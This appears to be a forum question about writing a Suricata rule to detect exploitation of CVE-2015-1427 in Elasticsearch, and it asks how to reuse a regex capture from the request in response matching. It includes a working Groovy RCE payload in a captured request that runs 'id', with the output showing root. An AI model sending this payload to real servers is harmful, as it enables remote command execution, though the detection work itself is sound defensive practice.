Suricata

when i write a rule to detect the CVE-2015-1427(Elasticsearch Groovy RCE),i cased some problem:
such as the request was like this:

POST /_search?pretty HTTP/1.1
Host: 192.168.2.177:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 156

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}

the response like this:

HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Content-Length: 406

{
  "took" : 631,
  "timed_out" : false,
  "_shards" : {
    "total" : 5,
    "successful" : 5,
    "failed" : 0
  },
  "hits" : {
    "total" : 1,
    "max_score" : 1.0,
    "hits" : [ {
      "_index" : "website",
      "_type" : "blog",
      "_id" : "AXWr4FMqhzelIzbx09av",
      "_score" : 1.0,
      "fields" : {
        "lupin" : [ "uid=0(root) gid=0(root) groups=0(root)\n" ]
      }
    } ]
  }
}

i just write rule use content keywords:conent:"script_fields";content:"lang";content:"groovy";content:"script";content:"Runtime";content:"exec";
because the keywords of "lupin" can changed random ,i think use regex like this :

\"script_fields\": {(.*?):{\"lang\":\"groovy\",\"script\":

it's wokr well tested on https://regex101.com/

how to use the regex results of group 1 on response content to match? have any ways or variable to use(suricata pcre can do this?)?
use this can accurately detect this http request and response was Successful attacked ,not msg that was a attempt attack action